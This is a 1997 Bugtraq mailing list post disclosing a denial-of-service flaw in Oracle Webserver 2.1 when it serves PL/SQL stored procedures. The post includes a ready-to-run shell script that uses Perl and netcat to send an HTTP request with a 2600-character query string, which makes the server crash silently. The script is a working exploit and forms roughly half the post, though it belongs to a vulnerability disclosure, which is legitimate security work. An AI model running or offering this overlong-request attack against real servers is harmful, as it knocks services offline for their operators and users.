[4987] in bugtraq
DoS against Oracle Webserver 2.1 with PL/SQL stored procedures
daemon@ATHENA.MIT.EDU (Simon Josefsson)
Tue Jul 22 19:07:08 1997
Date: Wed, 23 Jul 1997 00:15:31 +0200
Reply-To: Simon Josefsson <jas@PDC.KTH.SE>
From: Simon Josefsson <jas@PDC.KTH.SE>
To: BUGTRAQ@NETSPACE.ORG
Fellow bugtraqers, I stumpled over this tonight. It's a DoS-attack
against a Oracle Webserver 2.1 that serves PL/SQL stored procedures.
The server dumps quietly, I haven't found anything in the logs. v2.0
does not seem to exhibit this behaviour (v2.1 is the latest, but many
sites seem to still run v2.0).
I'm sorry if this is old news (but I'd appreciate of someone told me
if there is a bugfix somewhere).
(PL/SQL is, simply put, a scripting language within the Oracle database)
---
#!/bin/sh
#
# requires Perl and NetCat.
#
# usage:
# prg <host> <port> <path>
#
# example:
# # ./prg your.own.domain.com 80 /ows-bin
#
# if you have the PL/SQL stored procedure in /ows-bin/.
#
perl -e 'print "GET $ARGV[0]/fnord?foo=", "a" x 2600, " HTTP/1.0\n\n\n\n";' "$3"|nc $1 $2
---
S.
